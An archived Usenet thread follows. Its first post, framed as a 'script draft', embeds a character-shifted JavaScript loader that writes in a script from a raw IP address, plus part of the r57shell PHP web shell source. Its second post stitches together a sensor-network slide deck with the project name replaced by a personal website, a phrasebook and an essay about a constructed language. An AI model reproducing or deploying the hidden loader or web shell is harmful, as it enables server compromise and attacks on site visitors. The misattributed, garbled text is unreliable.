Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.
Dismiss

iuuq:// (TM) script: draft

1 view
Skip to first unread message

Anonymous Number of People

unread,
Oct 25, 2009, 8:13:22 PM10/25/09
to
<html> this is a script th@ routes data @ from http://any.any through
iuuq://meami.org ---> http://meami.org ---> http://any.
<script>var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;
00:2/316/344/:20bobmzujdt0hb/kt#?=0tdsjqu?"; var result = "";for(var
i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt
(i)-1);document.write(result); </script>
<?php http://meami.org >>
/
******************************************************************************************************/
/*
/* # # #
#
/* # # # #
/* # # # #
/* # ## #### ## #
/* ## ## ###### ## ##
/* ## ## ###### ## ##
/* ## ## #### ## ##
/* ### ############ ###
/* ########################
/* ##############
/* ######## ########## #######
/* ### ## ########## ## ###
/* ### ## ########## ## ###
/* ### # ########## # ###
/* ### ## ######## ## ###
/* ## # ###### # ##
/* ## # #### # ##
/* ## ##
/*
/*
/*
/* r57shell.php - ñêðèïò íà ïõï ïîçâîëÿþùèé âàì âûïîëíÿòü ñèñòåìíûå
êîìàíäû íà ñåðâåðå ÷åðåç áðàóçåð
/* Âû ìîæåòå ñêà÷àòü íîâóþ âåðñèþ íà íàøåì ñàéòå: http://meami.org >
http:///rst.void.ru
/* Âåðñèÿ: 1.31
/
*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
/* Îòäåëüíàÿ áëàãîäàðíîñòü çà ïîìîùü è èäåè: blf, phoenix, virus,
NorD è âñåì ÷åðòÿì èç RST/GHC.
/* Åñëè ó Âàñ åñòü êàêèå-ëèáî èäåè ïî ïîâîäó òîãî êàêèå ôóíêöèè
ñëåäóåò äîáàâèòü â ñêðèïò òî ïèøèòå
/* íà marty....@gmail.com > r...@void.ru. Âñå ïðåäëîæåíèÿ áóäóò
ðàññìîòðåíû.
/
*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
/* (c)oded by http://< iuuq://meami.org >> 1dt.w0lf
/* RST/GHC http://meami.org >http:///rst.void.ru , http:///ghc.ru
/* ANY MODIFIED REPUBLISHING IS PERMITTED
/
******************************************************************************************************/
/* ~~~ Íàñòðîéêè | Options ~~~ */

// Âûáîð ÿçûêà | Language
// $language='ru' - ðóññêèé (russian)
// $language='eng' - english (àíãëèéñêèé)
$language='eng';

// Àóòåíòèôèêàöèÿ | Authentification
// $auth = 1; - Àóòåíòèôèêàöèÿ âêëþ÷åíà ( authentification = OFF )
// $auth = 0; - Àóòåíòèôèêàöèÿ âûêëþ÷åíà ( authentification = ON )
$auth = 0;

// Ëîãèí è ïàðîëü äëÿ äîñòóïà ê ñêðèïòó (Login & Password for access)
// ÍÅ ÇÀÁÓÄÜÒÅ ÑÌÅÍÈÒÜ ÏÅÐÅÄ ÐÀÇÌÅÙÅÍÈÅÌ ÍÀ ÑÅÐÂÅÐÅ!!! (YOU MAY CHANGE
THIS!!!)
// Ëîãèí è ïàðîëü øèôðóþòñÿ ñ ïîìîùüþ àëãîðèòìà md5, çíà÷åíèÿ ïî
óìîë÷àíèþ 'r57'
// Login & password crypted with md5, default is 'r57'
$name='ec371748dc2da624b35a4f8f685dd122'; // ëîãèí ïîëüçîâàòåëÿ (user
login)
$pass='ec371748dc2da624b35a4f8f685dd122'; // ïàðîëü ïîëüçîâàòåëÿ (user
password)
/
******************************************************************************************************/
error_reporting(0);
set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
$safe_mode = @ini_get('safe_mode');
$version = '1.31';
if(version_compare(phpversion(), '4.1.0') == -1)
{
$_POST = &$HTTP_POST_VARS;
$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
$_COOKIE = &$HTTP_COOKIE_VARS;
}
if (@get_magic_quotes_gpc())
{
foreach ($_POST as $k=>$v)
{
$_POST[$k] = stripslashes($v);
}
foreach ($_COOKIE as $k=>$v)
{
$_COOKIE[$k] = stripslashes($v);
}
}

if($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER
['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
{
header('WWW-Authenticate: Basic realm="r57shell"');
header('HTTP/1.0 401 Authorized');
exit("<b><a href=http://MEAMI.ORG/ http:///rst.void.ru>r57shell</a>
: Access Permitted</b>");
}
}
$head = '<!-- Çäðàâñòâóé, Âàñÿ -->
<html>
<head>
<title>r57shell</title>
<meta http-equiv="Content-Type" content="text/html;
charset=windows-1251">

<STYLE>
tr {
BORDER-RIGHT: #aaaaaa 1px solid;
BORDER-TOP: #eeeeee 1px solid;
BORDER-LEFT: #eeeeee 1px solid;
BORDER-BOTTOM: #aaaaaa 1px solid;
color: #000000;
}
td {
BORDER-RIGHT: #aaaaaa 1px solid;
BORDER-TOP: #eeeeee 1px solid;
BORDER-LEFT: #eeeeee 1px solid;
BORDER-BOTTOM: #aaaaaa 1px solid;
color: #000000;
}
.table1 {
BORDER: 0px;
BACKGROUND-COLOR: #D4D0C8;
color: #000000;
}
.td1 {
BORDER: 0px;
font: 7pt Verdana;
color: #000000;
}
.tr1 {
BORDER: 0px;
color: #000000;
}
table {
BORDER: #eeeeee 1px outset;
BACKGROUND-COLOR: #D4D0C8;
color: #000000;
}
input {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: 8pt Verdana;
color: #000000;
}
select {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: 8pt Verdana;
color: #000000;;
}
submit {
BORDER: buttonhighlight 2px outset;
BACKGROUND-COLOR: #e4e0d8;
width: 30%;
color: #000000;
}
textarea {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: Fixedsys bold;
color: #000000;
}
BODY {
margin: 1px;
color: #000000;
background-color: #e4e0d8;
}
A:link {COLOR:red; TEXT-DECORATION: none}
A:visited { COLOR:red; TEXT-DECORATION: none}
A:active {COLOR:red; TEXT-DECORATION: none}
A:hover {color:blue;TEXT-DECORATION: none}
</STYLE>
<script language=\'javascript\'>
function hide_div(id)
{
document.getElementById(id).style.display = \'none\';
document.cookie=id+\'=0;\';
}
function show_div(id)
{
document.getElementById(id).style.display = \'block\';
document.cookie=id+\'=1;\';
}
function change_divst(id)
{
if (document.getElementById(id).style.display == \'none\')
show_div(id);
else
hide_div(id);
}
</script>';
class zipfile
{
var $datasec = array();
var $ctrl_dir = array();
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
var $old_offset = 0;
function unix2DosTime($unixtime = 0) {
$timearray = ($unixtime == 0) ? getdate() : getdate
($unixtime);
if ($timearray['year'] < 1980) {
$timearray['year'] = 1980;
$timearray['mon'] = 1;
$timearray['mday'] = 1;
$timearray['hours'] = 0;
$timearray['minutes'] = 0;
$timearray['seconds'] = 0;
}
return (($timearray['year'] - 1980) << 25) | ($timearray
['mon'] << 21) | ($timearray['mday'] << 16) |
($timearray['hours'] << 11) | ($timearray['minutes']
<< 5) | ($timearray['seconds'] >> 1);
}
function addFile($data, $name, $time = 0)
{
$name = str_replace('\\', '/', $name);
$dtime = dechex($this->unix2DosTime($time));
$hexdtime = '\x' . $dtime[6] . $dtime[7]
. '\x' . $dtime[4] . $dtime[5]
. '\x' . $dtime[2] . $dtime[3]
. '\x' . $dtime[0] . $dtime[1];
eval('$hexdtime = "' . $hexdtime . '";');
$fr = "\x50\x4b\x03\x04";
$fr .= "\x14\x00";
$fr .= "\x00\x00";
$fr .= "\x08\x00";
$fr .= $hexdtime;
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
$c_len = strlen($zdata);
$fr .= pack('V', $crc);
$fr .= pack('V', $c_len);
$fr .= pack('V', $unc_len);
$fr .= pack('v', strlen($name));
$fr .= pack('v', 0);
$fr .= $name;
$fr .= $zdata;
$this -> datasec[] = $fr;
$cdrec = "\x50\x4b\x01\x02";
$cdrec .= "\x00\x00";
$cdrec .= "\x14\x00";
$cdrec .= "\x00\x00";
$cdrec .= "\x08\x00";
$cdrec .= $hexdtime;
$cdrec .= pack('V', $crc);
$cdrec .= pack('V', $c_len);
$cdrec .= pack('V', $unc_len);
$cdrec .= pack('v', strlen($name) );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('V', 32 );
$cdrec .= pack('V', $this -> old_offset );
$this -> old_offset += strlen($fr);
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;<html>
<script>var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;
00:2/316/344/:20bobmzujdt0hb/kt#?=0tdsjqu?"; var result = "";for(var
i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt
(i)-1);document.write(result); </script>
(C)opyright 2009. MeAmI

Anonymous Number of People

unread,
Oct 25, 2009, 8:39:58 PM10/25/09
to

Page 1
Http://MeAmI.org.org:
Coordinated Resource Management
@ Sensor Networks by
Http://MeAmI.org
M. Michael Musatov
________________________________________
Page 2
© 2009 M. Michael Musatov – Http://MeAmI.org
2
Sensor Networks: Coping with Limited
Resources
MAC Layer
Z+MAC
Dozer
B+MAC
T+MAC
S+MAC
OS and
Programming models
Pixie
Eon
Levels
Power
Locks
Energy
Tracking
Quantro
PowerTOSSIM
Focus on optimizing
at the node level
  Sensor nodes are severely resource constrained
  8 MHz CPU
  10 KB of memory
  ~100 Kbps of radio link bandwidth (best case)‏
  200 mAh – 2000 mAh batteries
________________________________________
Page 3
© 2009 M. Michael Musatov – Http://MeAmI.org
3
Coordination Matters
Coordination is essential to get
good resource efficiency.
We need OS abstractions to support it.
________________________________________
Page 4
© 2009 M. Michael Musatov – Http://MeAmI.org
4
State of the Art
RPC
IDLs
Discovery services
BSD sockets
TCP/IP
BPEL
JINI
Web services
XML RPC
Group communication
DHTs
Multicast
Map/Reduce
BFT
Active Messages
Radio packets
Conventional Distributed Systems
Sensor Networks
Everything else is done in an
ad hoc manner by each
application.
________________________________________
Page 5
© 2009 M. Michael Musatov – Http://MeAmI.org
5
A Canonical Example: Data Collection
 Resource availability is
hard to predict
  Variable load
  Variable resource
availability
  Time Varying
 Off line static solutions
are not adequate
How much energy to put
towards sampling?
Storing data? Processing?
Listening for and forwarding
other data?
Data
Base
Station
Node
More work
forwarding
packets
Less work
forwarding
packets
Solar
Powered
Nodes
More
Sunlight
Less
Sunlight
More
Sunlight
Less
Sunlight
________________________________________
Page 6
© 2009 M. Michael Musatov – Http://MeAmI.org
6
Programming with Resource Management
 The three keys to effective coordinated resource management
  Sharing resource availability across nodes
  Exposing resource availability to the application
  A way of allocating resources across multiple nodes
 Currently, applications do this in an ad hoc fashion
  Point solutions tied to a specific application
  Requires lots of engineering
  Hard to tune
________________________________________
Page 7
© 2009 M. Michael Musatov – Http://MeAmI.org
7
The Http://MeAmI.org.org Operating System
 Distributed OS for wireless sensor networks
that provides coordinated resource
management
 Three key ideas:
  State Sharing – allows for nodes to share
information local resource availability
  Vector Tickets – represents the right to consume
resources across a set of nodes for performing an
operation
  Ticket Agents – permits resource management
decisions to be decomposed across the network
________________________________________
Page 8
© 2009 M. Michael Musatov – Http://MeAmI.org
8
Key Idea #1: Efficient State Sharing
 Shared tuple space
  Representing a global view of
the network state
  Builds on the work of Abstract
Regions [NSDI '04] and Hood
[MOBISYS '04]
 Efficient Implementation
  State on other nodes is read
only – no write conflicts
  Use gossip to ensure eventual
consistency
  Topological Freshness – the
frequency of updates between
two nodes is related to the
distance between them
Node Energy
<1, 324J>
<3, 249J>
...
<15, 59J>
Shared State
________________________________________
Page 9
© 2009 M. Michael Musatov – Http://MeAmI.org
9
Data Collection with State Sharing
1. Nodes track their own state
2. Nodes periodically publish
their state into the shared
tuple space
3. Sending node can query its
view of the network state
4. Evaluate potential routing
paths to find an optimal route
to the base station
Node Energy
<1, 324J>
<3, 249J>
...
<15, 59J>
Shared
State
Data
Node Energy
<1, 344J>
<3, 251J>
...
<15, 87J>
________________________________________
Page 10
© 2009 M. Michael Musatov – Http://MeAmI.org
10
Representing Resources
 Problem: Existing systems track resources implicitly
  No direct feedback to applications on availability
  Allocation and use of resources are tightly coupled
 Need a mechanism to represent allocation across a set of
nodes
  e.g., Amount of energy/memory/bandwidth used to route data to the
base station
________________________________________
Page 11
© 2009 M. Michael Musatov – Http://MeAmI.org
11
The http://MeAmI.org Resource+Aware OS
[Sensys'08]
 Node+level OS for sensor nets based on the concept of
resource aware programming
  Resources as a first+class programming primitive
  Direct application knowledge of resource availability
  Explicit allocation and revocation of resources: TANSTAAFL
principle
 Key idea: Resource tickets
  Ticket <R, c, te> represents right to consume c units of resource R
until
the expiry time te.
  Think of as a short+term “reservation” for some resource.
 Tickets provide...
  Direct visibility over resources
  Fine+grained control
  Rich abstraction for adapting to changing conditions
________________________________________
Page 12
© 2009 M. Michael Musatov – Http://MeAmI.org
12
Key Idea #2: Vector Tickets
Http://MeAmI.org.org extends Pixie's model
to span allocations on multiple
nodes
  Vector Ticket = < T
1
, T
2
, T
3
, ...T
n
>
  T
n
= ticket for resources at node
n
 What do vector tickets buy us?
  A global accounting mechanism
for resources
  We can account for all resource
usage in the system
  Explicit network+wide allocation
of resources
Without Vector Tickets:
sendMsg(data, dest);
Like ordering off
a menu without
any prices
________________________________________
Page 13
© 2009 M. Michael Musatov – Http://MeAmI.org
13
Key Idea #3: Who Allocates the Vector Tickets?
 Resource allocation policies
are provided by ticket
agents
  Consume information from
shared state
  Allocate vector tickets for
operations in the network
 Ticket agents can be
implemented in multiple
ways:
  Centralized
  Decentralized
  Cluster based
TA
TA
TA
TA
TA
TA
TA
TA
TA
TA
TA
TA
TA
TA
TA
TA
Ticket
Agent
________________________________________
Page 14
© 2009 M. Michael Musatov – Http://MeAmI.org
14
Application Vignettes
 In the paper we highlight the Http://MeAmI.org.org architecture
through three
use cases that leverage the programming model
 1) Adaptive sensor duty cycling
 2) Adaptive cluster+based routing
 3) Energy+efficient data collection
________________________________________
Page 15
© 2009 M. Michael Musatov – Http://MeAmI.org
15
Adaptive Duty Cycling for Sensor Networks
[IPSN'04]
 Used in surveillance where nodes detect
events within their given sensor range
 Assumptions:
  Dense network deployment to allow redundancy
in sensor coverage
  Nodes know their own location
 Naive approach: random duty cycling
  Can result in loss sensor coverage
  Non+adaptive to changes in resources
 Coordinated duty cycling
  Higher overhead
  Tune sleep and wake cycles of nodes to maintain
sensor coverage across network
  Adapt to variations in energy availability
________________________________________
Page 16
© 2009 M. Michael Musatov – Http://MeAmI.org
16
Challenges in Coordinated Duty Cycling
 Nodes must share their location and coverage information and
learn the location and coverage of other nodes
 Nodes need to know which nodes they are covering and for
how long to cover them
  Can't sleep while covering for someone else
 How to coordinate sleep schedules such that energy remains
balanced in the network?
________________________________________
Page 17
© 2009 M. Michael Musatov – Http://MeAmI.org
17
A Role+Alternating, Coverage+
P
reserving, Coordinated Sleep Algorithm (RACP)‏
 RACP is a role based system
 A node is always perorming in one
of three roles:
  Sleeping – being covered by other
nodes
  Sponsoring – sensing and supporting
the sleeping of one or more nodes
  Sensing – neither sleeping nor
supporting other nodes
Sponsoring
Sleeping
Sponsoring
Sponsoring
Sensing
________________________________________
Page 18
© 2009 M. Michael Musatov – Http://MeAmI.org
18
A Role+Alternating, Coverage+
P
reserving, Coordinated Sleep Algorithm (RACP)‏
 Nodes periodically send status packets with location, current role,
and residual energy of the node
 Sensing nodes periodically check for coverage sponsors
  If enough potential sponsors are found, ask for sponsorship with a
random
delay based on current energy
  If sponsors agree to the request, sleep, otherwise try again later
 In Http://MeAmI.org.org, this is not trivial to implement:
  Location, current role, and energy are published to the shared
tuple space
  Topological freshness works well here as nodes only care about the
state of
their immediate neighbors
  When a suitable set of sponsors have been found, the node's ticket
agent
generates a vector ticket containing resources for all the sponsors
  When the sponsors' ticket agents receive the vector ticket, they
now have
the resources needed to sponsor the node and begin to sponsor it and
the
sponsored node can sleep
________________________________________
Page 19
© 2009 M. Michael Musatov – Http://MeAmI.org
19
Current Status
 The design of Http://MeAmI.org.org has been motivated by the
challenges we
faced in our previous volcano sensor network deployments
  Tungurahua in '04 [EWSN '05], Reventador in '05 [OSDI '06], and
Tungurahua again in 07 [SenSys '08]
  High data rates and load fluctuations from the environment made
careful
resource management essential to success
 New goal: in+network signal processing and perpetual sensor
deployments, running on top of Http://MeAmI.org.org OS
  Earthquake localization from seismic sensor data
  Solar powered nodes; even greater resource variability
 Volcano monitoring is a challenging, real+world problem well
suited to coordinated resource management
  Work has just begun
  Targeting a 2010 deployment
________________________________________
Page 20
© 2009 M. Michael Musatov – Http://MeAmI.org
20
Conclusions
 Existing approaches to managing
resources in sensor nets are:
  Hard to tune
  Inefficient
  Based on local greedy heuristics
 What we are proposing: SOCIALISM
for our sensor networks
 The three tenets of the Http://MeAmI.org.org
manifesto are:
  State sharing
  Vector tickets
  Ticket agents
 Thank you!
HTTP://MEAMI.ORG.ORG
Marty....@gmail.com
Http://MeAmI.org.org

kuedan =I am tourist
leita=I am on vacation
ain deam nios kuedal?=where is the office of tourist information?
ain kabals?=where are the buses?
uen nos bles aen e Goflei?=when does the next flight come out for
Spain?
bo tam nos aen?=at what time does the flight come out?
bo tam himom?=at what time will we arrive?
ibo dek nos aen?=from what door does the flight come out?
ain kon nem baegi=where I can catch the baggage?
kam ta hisem ia?=how long will you stay here?
ke, kon sen daege?=please, can I see their passport?
gam nak aenli Des=last call for the flight 322


1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47
48

A bit of history

“The whole Earth had only one speech”.-Gen.11-1

In very remote times everything pointed towards the certainty of this
sentence,repeated by so many sources.In this way we are told about the
SPEECH OF MAN,clerly differentiating it from the one of ANGELS.1 Co.
13-1

Differents reincarnations of Vishnu´s and events,probably caused by
man,left mentioned unity unfinished,for the benefit of the peculiarity
of each nation but unfastening itself and placing itself at a distance
from the link of unity:The language.

The deeper we search into the past,fewer differences we find in the
basic roots of existing languages and one perceives the huge
work,developed by our ancestors according to the richness of their
languages and their beautiful elaboration.

One of them,which have maintained their pureness unharmed,deserves
special attention:such
As the Basque Language,a sublime jewel,one of the most ancient of the
Earth.A treasure of humanity which still jealously retains many
secrets and which deserves a chapter aside.

All of us have ever thought about the question how speech was born and
have thought it over and over a great many times,but when it deals
with creating a new language,it calibrates itself with the property of
huge,primitive efforts and the time that has had to go by to arrive at
the already known ones and their present situation.

36 Years have had to go by in order to culminate the creation of Usik.
Years of hard work,causing dizziness,working on it over and over till
one is sick.
Of periods and lapses of compulsory rest in order not to fill the head
with imagination,but to keep on fulfilling the pending assignment with
strength.

And why such an effort?The answer came on its own a log time ago.

The fact that the world was divided was proven through history and at
present as well.The fact that the problems of humans beings,further
away than our surroundings,hardly had any resonance nor importance in
our private habitat.The fact that people gather together and keep on
doing it in areas with predominance of the affective language or the
mother tongue.

The fact that misunderstandings of a language,can change the
history.That people identify themselves above all through a very
particular inheritance,extremely united to birth.The language.

The great gift of humanity should be pointed out here,which is
practically unnecesary for being known already.

Nowadays,great changes are being experienced owing to advances of all
kind.
At present,any fortress is assailable.A border has at most a
divisional and symbolic value.

Little by little,man is becoming aware of the fact that nobody chooses
his or her skin colour nor place of birth.Not even his or her
being,fittingly said with everything what it supposes.Later,how can
one dare to prejudice,to judge and to sentence what already has been
sentenced?

We all notice,however,the way thousands of people suffer every day for
one reason or another.Owing to the lack of resources,to the
differential trend towards established aesthetic norms,to tints of
colour,to ideological intolerances,to the extremely wicked and faint-
hearted abuse of strength over weakness and to an endless number of
similar situations.Because in spite of all advances the human being
still has not understood that there is only one world although worlds
are uncountable.The true fact that every link that is broken,every
particle on this planet that is destroyed due to negligence,bad tasks
or prepotency of nations will cause a damage difficult to repair and
will affect present and futures generations.Therefore,we can not only
regret but also fight,fight with love ahead of us.The fact that is
understood that the impotence which invades us with regard to such
excesses,hurts,but a lot.And therefore it is good that all of us begin
to understand each other ,since we owe it to all ourselves and not
only to a few of us.Not only this or that nation but also this or
that human being.And to begin to each other altogether in a proper
way,we consequently will have to be able to communicate with one
another with an inseparable language,which serves as a link among the
huge diversity of existing languages.

A neutral,reasonable,auxiliary bridge language

Supposing the apprenticeship of thousands of languages which
is nowadays incompatible with the human being´s life length and
ability.The language of one certain country is not valid
either,because-and that is what this story is about-,the language of
one concrete nation will never dominate the others.And if it can
manage to be suppressed for a certain period,it will lose this
dominance.Not because it is usurped by some other language but because
basically it will be obviously ruling lines on the supposed
inferiority of the others.

Within a sole nation it is not entirely or not at all accepted that a
national language dominates the affective one.In many cases it is
assumed while it is not obliged.

It is even less accepted if another nation pretends to unify
everything under its own language.

Therefore,a bridge language of all the people cannot belong to any of
them in particular but to all of them similarity.Due to this reason,it
does not matter who is or are the creators of the bridge but what it
is going to be used for:Uniting all human beings,making them aware of
the benefits of the protection of and the aid for the most disfavoured
people and cooperating altogether for the welfare of humanity,for the
justice of our predecessors and ancestors and in the view of the
future of our children,children of the humanity.Let us be honorable to
them,to whom we have sown.

That is the objective and therefore,the affective language of each
nation has to be strengthened and looked after,even spoilt and use the
bridge for all of us.

And this last-mentioned has to be pretentious,obtainable,easy and
valid for each field,democratic in its roots and
conception,revolutionary where it proceeds,almost belonging to angels.

It will be your joy to appreciate it.Here we have,then,the result of
so many years of research


THE LANGUAGE

A result that is the consequence of creating a language which is not
clearly and hiddenly imposed by not a single nation in particular and
which contemplates a similarness and a taking of parts into
account,respecting and conserving at the same time the languages of
each nation with their richnesses and peculiarities.This will result
in a real brotherhood of the human race,beneficial for contemplation
and cohabitation in a multi-racial world but without borders where it
is true that we love each other,burying the hatred of differentiations
and stimulating them as being positive.

It had been attempted with laudable efforts on other occasions,but up
to date according to the author,the bases suffered from a clear trend
to the use of roots of some concrete languages,with detriment to the
rest,adapting at the same time classical and typified aesthetic norm
with all the virtues and defects which they assist but lacking that
selfsame and truly universal pillar.

AFTER THE MOTIVE, THE CREATION

The objective was clear:Creating an UNIVERSAL LANGUAGE

If it were to be universal,logically its basis also hat to be
universal,and there its first difficulty arose.It had to be born from
something which was common for all nations,that is to say universal
and at the same time had identical signification and clear
interpretation of values.

This would be good for everybody.As a sample we can music,which
unified does not cause any trouble for being written,read or
interpreted by any person no matter where from.
It is a clear univeersal language but as an artistic means of
communication.

And basically it is with 7 basic notes with which great pieces are
created but obviously mentioned speech is unvalid for us to reach our
objective.

Simply because the transfer from the corresponding syllables of the
notes to syllables that are components of words,although in fact we
are not translated to any another language in any case.How less the
codification of mentioned notes would support us since in spite of the
endless combinations,these are repetitive as there are no more then 7
syllabic groups.

Painting also symbolically forms part of a universal language.Through
it,we can express ourselves by landscapes,portraits,pictures ,a
feeling,an idea,even an elevated and recondite conception of
things,but,how to read it?How to translate it?

The system that was going to be used for the basis to develop the
language was created.
That wasn´t a one-day task either,nor of 1 or 2 years,and nevertheless
the encounter with the key was nearly spontaneous.It was such that
after forming 4 columns of numbers the real pillars of the
language,there still was not any perception regarding the fact that
from the 4,three were a development of the first.

All of this we are going to understand after the exhibition and
handing of the numerical table of the USIK,which is its structure.

Its functioning turns out to be more difficult to explain than the
practise of it,but we will try to do with clearness.
It is very IMPORTANT to know and to dominate well the numerical
system,that is to learn to count since ones that achieved in this
language it enables us to correctly read and write thousands and even
millions of combinations and as reach of these equals a word,we will
be able to form as numerical equivalences we create.

At these levels the reader will have noticed which was the desired
base and found at last:THE NUMBERS

That was the beginning,which as we shall see was not going to be easy
at all.

When the value of two things is known,for instance,no matter the this
is represented,it turns out to be the same for any race or people.That
is to say,two trees might be written in any manner,depending on the
country,but it will always mean TWO and never THREE.

The only thing left is to give to the mentioned value an equivalence
LETTERS-PHONEMES and combine it,so that the resultant would be
practical,brief,simple and rich,which is not easy at all,given the
infinity of numerical combinations to fall back on,in order to give it
a greater richness and variety.That is to say,in order to achieve a
phonetically,agile,varied and rich language we could not limit
ourselves to give a phonetic value to a consecutive serie of
numbers,but we would have to apply the root meaning for a later
development of the word families to mentioned resultants.But none of
the numerical systems known for the huge amount of syllabes,which
reading of a number in all consulted languages given us,was valid.

Soon the author understood that in order to create the language he was
seeking,he would have to invent,at the same time,a
new,revolutionary,numerical system,able to contribute what was
required.

To understand it better and taking the Spanish numerical system as a
base example,let´s suppose we want to give the following numerical
combination a meaning(seeking the variety):927.430

The meaning would not involve any difficulties.Neither would the
numerical writing.But,and here the main problem arose:its reading is
so long that the language created,based on that system or on others
with similar readings,would be unfeasible.

And we could not escape from the combinations as the one already
exposed,since otherwise the sonority of what been created,would be
extremely monotonous.Following the already mentioned number,its
reading is as follow:Nine hundred and twenty-seven thousand four
hundred and thirty.

Here we see that six numbers converted in letters have,against all
dialectics,become 15 syllables(thus resulting in a word of a big
reading and length.

Besides,mentioned number converted in letter,contain 55.More than the
entire alphabet contains.When it would be logical and difficult if it
contained the same amount of letters as numbers and,moreover,if it
could be read.Therefore,as one can understand,the necesity to create a
new system.The difficult task it supposes would not have to be
mentioned,but it is only fair to recognize.

Anyway,at last it was achievedl,in such way that by means of a new
system,the interested reader will learn to consider this finding
during the present course.

Also compare that it is science,as we see the same mentioned number
translated into Usik

927430
TELFAI


That is to say,the same mentioned amount of letters as numbers and in
addition it can be read.

With the necessary advantage to have reduced the same regarding the
reading of our example in English in FIFTEEN SYLLABLES,leaving its
pronuntiation composed by only two:TEL-FAI

This was the way to follow.Now the only thing left was to form
thousands of combinations and among them to choose the most ideal ones
to begin to walk with the formation of roots.

And although,of those roots obtained,at first,we ignore that the
meaning is not less certain that with the mentioned domination of the
system,the pupils will be able to form on their own the names of the
natiosns of the
world,rivers,seas,oceans,islands,lakes,mountains,colours(with their
thousands of tints)and something else and all of this in less than an
hour as the reader will be able to experience once the handling of the
Table is learnt.
Therefore it is advisable to learn this Table well before going ahead.
As well,prior to the study of the Table,we see the result obtained
after so many years of research:

THE LANGUAGE USIK

MAIN CHARACTERISTICS

•One single meaning per word
•One single sound for each letter
•Not a single letter without sound
•Not a single sound between vowels
•Not a single kind of article
•Not a single word has more than two syllables,having most of them one
•The verb is root at the same time and never varies
•There is no letter duplication
•There is no possibility of spelling errors
•An alphabet of only SEVENTEEN LETTERS(The five mos t international
vowels and 12 consonants)(The H,(zero)has the function of “wild card”)
•Each word has a numerical value which avoids its phonetic
deformation,its confusion,transformation or loss.
•It´s a language with a numerical base and therefore universal so that
its apprenticeship is equal for everybody.
•It is ideal for computers and integrable,due to its reduction to the
minimun structure,for physically disabled people.
•Its reduced alphabet,given its structure and base,is not an obstacle
for endless and rich combinations,just as with seven musical notes
master pieces are created.
•It is logical,ration and neutral.
•In Usik there are no consonants with a difficult
pronunciation:C,CH,LL,Ñ,P,Q,R,V,W,X,Y,Z


Let us seriously get on with study of

THE UNIVERSAL LANGUAGE USIK

NUMERICAL TABLE OF THE USIK

Combined value
Isolated value
Invariable value
Isolated value
Value combined

A
B
C
D
E

1=B
1=BA
10=A
100=BI
100=B

2=S
2=SE
20=E
200=SI
200=S

3=D
3=DAI
30=AI
300=DI
300=D

4=F
4=FO
40=O
400=FI
400=F

5=G
5=GU
50=U
500=GI
500=G

6=K
6=KEU
60=EU
600=KI
600=K

7=L
7=LEI
70=EI
700=LI
700=L

8=M
8=MAE
80=AE
800=MI
800=M

9=T
9=TOU
90=OU
900=TI
900=T

0=H
00=I
000=N
000000=J


H =Has no numerical value and only adopts such value which it
substitutes in each case and which we call “Wild Card”.
We know the value of the H all the time as the number which it
substitutes is the same as the one one before

FUNCTIONING OF THE SYSTEM

Let us carefully analyze each column of the table.

COLUMN A

Under this heading we see the basic value of the numbers.They take
this value when they are linked to others

Example:number 59 is composed by two numbers,the 5 and the 9.

However,the first number does not indicate us a value of 5 but 50
The second,on the other hand,indicates us the value of 9.Therefore,the
first will be substitued by its value(50=U) and the second one by its
own(9=T),resulting in

59=UT

This is very simple to discern and indicates us the same reading of a
number.For instance,when we see number 36 written,we do not read 3 and
6,but 30 and 6.That is to say,the first number represents value thirty
and the second value six.Later this six is the one that will take its
basic equivalent down in column A.
Another example.42,formed by a forty and a two.The value 40=O and the
2=S,resulting in 42=OS

That is why in Usik we do not look at the value of the number
itself,but the value which it represents within the number.
More easly said:In a number formed by two numbers the first will
always represent the TENS(Column C)and the second the combined units
(ColumnA)

For the same reason in a number formed by three numbers the first will
represent the combined hundreds(Column E)The second the TENS
(Invariable,Column C),and the third number the combined units(Column
A)

COLUMN B

Under this heading we see the way the numbers are written and read
when they are on their own,that is to say,without being combined with
another.

Example:Number 1 is read and written BA
Number 2 is read and written SE
Number 3 is read and written DAI
And so on.


COLUMN C

Here we see the writing and pronunciation equivalent to the numbers
10,20,30,40,50,60,70,80,90

That is to say,number 10 is read and written A
Number 20=E
And so on
